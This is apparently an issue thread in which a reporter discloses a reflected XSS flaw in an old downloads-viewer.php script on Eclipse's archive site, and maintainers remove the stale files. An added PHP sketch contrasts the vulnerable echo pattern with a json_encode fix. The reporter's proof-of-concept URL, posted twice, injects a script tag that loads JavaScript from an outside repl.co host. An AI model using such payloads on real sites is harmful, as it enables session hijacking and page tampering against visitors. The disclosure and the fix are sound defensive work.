Hi team, how are you? I found a vulnerability in your site. I leave the PoC URL: https://archive.eclipse.org/tools/emf/scripts/downloads-viewer.php?s=testtest%22%7D%3B%3C/script%3E%3Cscript+src%3Dhttps://BitterAcceptableRegister.mexicanoss.repl.co/script.js%3E%3C/script%3E
@Ed, WDYT?
This is an XSS vulnerability, do you know what it is?
I have no idea how those got there. They look to be extremely old files with all kinds of crazy old stuff. https://archive.eclipse.org/justj/?file=tools/emf/scripts It looks like someone copied a backup and left it to rot...
ok, this is a bug
@Ed, would you mind removing the files if you can?
I did not upload those files, I only found a JavaScript injection in that domain: https://archive.eclipse.org/tools/emf/scripts/downloads-viewer.php?s=testtest%22%7D%3B%3C/script%3E%3Cscript+src%3Dhttps://BitterAcceptableRegister.mexicanoss.repl.co/script.js%3E%3C/script%3E Do you know what this is? JavaScript injections are processes where you can insert and use your own JavaScript code on a page, either by entering the code in the address bar or by finding a website's XSS vulnerability.
@Nicolas, we get that. As the php scripts you've detected the XSS in are rotten files, I was asking @Ed to just delete those scripts.
Sorry, I tried but I cannot remove them: https://ci.eclipse.org/emf/job/promotion-shell/lastBuild/console
I've removed all php scripts in that folder. Thanks.
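Added example, not part of the thread and not the original `downloads-viewer.php` source (which the thread never shows): a sketch of why a value shaped like the reported `s` parameter breaks out of an inline script block, next to an encoding that keeps it inside a string literal. The function names, the `opts` variable, the reflection pattern and the `example.invalid` host are assumptions made for illustration.

```php
<?php
// Assumption: the script echoed the `s` query parameter into a JavaScript
// string inside an inline <script> block, which is the shape implied by the
// PoC's `"};</script><script ...>` break-out sequence.

// Constructed sample input with the same structure as the reported value;
// example.invalid is a placeholder host.
$s = 'testtest"};</script><script src=https://example.invalid/x.js></script>';

// Vulnerable pattern (hypothetical reconstruction): raw interpolation.
function render_vulnerable(string $s): string
{
    return "<script>var opts = {search: \"$s\"};</script>";
}

// Hardened: json_encode() emits a complete JS string literal, and the HEX
// flags turn <, >, &, ' and " into \uXXXX escapes, so the HTML parser never
// sees a closing </script> tag inside the block.
function render_hardened(string $s): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_THROW_ON_ERROR;
    return '<script>var opts = {search: ' . json_encode($s, $flags) . '};</script>';
}

// Count the <script> start tags an HTML parser would find in the output.
function script_tags(string $html): int
{
    return preg_match_all('/<script\b/i', $html);
}

// The raw rendering contains an extra, attacker-supplied script element;
// the encoded rendering contains only the page's own.
printf("vulnerable: %d script start tags\n", script_tags(render_vulnerable($s)));
printf("hardened:   %d script start tags\n", script_tags(render_hardened($s)));
```

For files that are no longer maintained, removing them from the served tree, as was done here, eliminates the exposure without needing any such fix.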